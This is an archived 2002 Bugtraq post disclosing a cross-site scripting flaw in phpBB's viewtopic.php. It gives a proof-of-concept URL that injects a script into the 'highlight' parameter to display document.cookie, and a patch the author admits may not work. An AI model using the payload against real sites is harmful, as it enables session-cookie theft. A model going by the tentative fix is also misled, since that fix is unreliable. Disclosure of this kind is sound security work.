XSS bug in phpBB

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: bugtraq@securityfocus.com
Subject: XSS bug in phpBB
From: Arab VieruZ <arabviersus@hotmail.com>
Date: 18 Nov 2002 12:33:41 -0000


Vulnerable systems:
The Last ver

Exploit:
http://phpbb.com/phpBB/viewtopic.php?
t=17071&highlight=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>

(without "*")

Solution:
i think that will work , but im not sure

open viewtopic.php and put this code

$highlight = htmlspecialchars($highlight);
$highlight = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", 
$highlight);

Prev by Date: RE: AIM 5.1.3036 buffer overflow
Next by Date: Update: iDEFENSE Security Advisory 11.19.02b: Eudora Script Execution Vulnerability
Previous by thread: RE: AIM 5.1.3036 buffer overflow
Next by thread: Update: iDEFENSE Security Advisory 11.19.02b: Eudora Script Execution Vulnerability
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux